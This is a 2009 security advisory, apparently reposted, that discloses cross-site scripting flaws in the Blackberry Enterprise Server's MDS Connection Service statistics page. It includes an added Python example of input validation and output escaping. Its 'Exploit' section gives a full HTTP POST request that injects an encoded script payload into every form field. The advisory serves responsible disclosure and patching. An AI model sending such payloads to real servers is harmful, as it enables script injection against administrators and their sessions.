securityvulns: SECURITYVULNS:DOC:21697
Apr 18, 2009 - 12:00 a.m.

ERNW Security Advisory 01-2009: XSS in Blackberries Mobile Data Service Connection Service

ERNW Security Advisory 01-2009

XSS in Blackberries Mobile Data Service Connection Service

Author: Michael Thumann <mthumann[at]ernw.de>

  1. Summary
    The Blackberry Mobile Data Service Connection is vulnerable to
    several XSS attacks in the "Customize Statistics Page".

  2. CVSS V2 Base Score : 3.5 (based on vendor rating)

  3. Products affected
    Blackberry Enterprise Server: all versions prior to 4.1.6 MR4

  4. Patch Availability : A patch is available from the vendor.

  5. Details
    Injecting scripts (containing standard and encoded XSS attacks) into
    all the fields of the "Customize Statistics Page" reveals that none
    of the fields is properly validated for malicious input and that the
    output isn't sanitized.
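
    An added example, not part of the original advisory or of the vendor's
    code: the two missing controls named above, per-field input validation
    and output encoding, applied to a form body that uses three of the
    advisory's field names. The field formats in FIELD_RULES, the sample
    body and the function names are assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qsl

# Constructed sample body: three of the advisory's field names, two with
# plausible values and one carrying the advisory's test string.
SAMPLE_BODY = (
    "customDate=2009-04-16&interval=60&"
    "referenceTime=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E"
)

# Assumed formats (not taken from the advisory): what each field may hold.
FIELD_RULES = {
    "customDate": re.compile(r"\d{4}-\d{2}-\d{2}"),
    "interval": re.compile(r"\d{1,6}"),
    "referenceTime": re.compile(r"\d{1,2}:\d{2}"),
}


def validate(body):
    """Split decoded form fields into (accepted, rejected) by allowlist."""
    accepted, rejected = {}, {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        rule = FIELD_RULES.get(name)
        if rule is not None and rule.fullmatch(value):
            accepted[name] = value
        else:
            rejected[name] = value  # unknown field or value outside its format
    return accepted, rejected


def render_unsafe(name, value):
    """The flawed pattern: the submitted value is echoed into markup as-is."""
    return '<input name="%s" value="%s">' % (name, value)


def render_input(name, value):
    """Hardened form: HTML-encode everything placed into the attribute."""
    return '<input name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


if __name__ == "__main__":
    ok, bad = validate(SAMPLE_BODY)
    print("accepted:", ok)
    for field, raw in bad.items():
        print("rejected:", field, "->", render_input(field, raw))
```

    Validation rejects the field before it is stored or processed; the
    encoding step keeps a value inert even if it is echoed back in an
    error page.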

  6. Solution
    Update the affected products to the current version.

  7. Time-Line
    16 Feb 2009: Discovery of the vulnerability
    02 Mar 2009: Vulnerability reported to vendor
    02 Mar 2009: Answer from vendor
    16 Apr 2009: Patch available
    16 Apr 2009: Public Disclosure

  8. Exploit
    POST /admin/statistics/ConfigureStatistics HTTP/1.0
    Cookie: JSESSIONID=…
    Content-Length: 753
    Accept: */*
    Accept-Language: en-US
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
    Host: …
    Content-Type: application/x-www-form-urlencoded
    Referer: http://x:8080/admin/statistics/ConfigureStatistics

customDate=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
interval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
lastCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E
&lastIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%
3E&nextCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript
%3E&nextIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%
2Fscript%3E&action=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E
&delIntervalIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
addStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
delStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
referenceTime=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E

  9. Thanks
    We would like to thank the guys from Blackberry for working
    together on this issue in a professional and responsible way.

  10. Disclaimer
    The information in this advisory is provided "AS IS"
    without warranty of any kind. In no event shall the authors be liable
    for any damages whatsoever including direct, indirect, incidental,
    consequential, loss of business profits or special damages due to the
    misuse of any information provided in this advisory.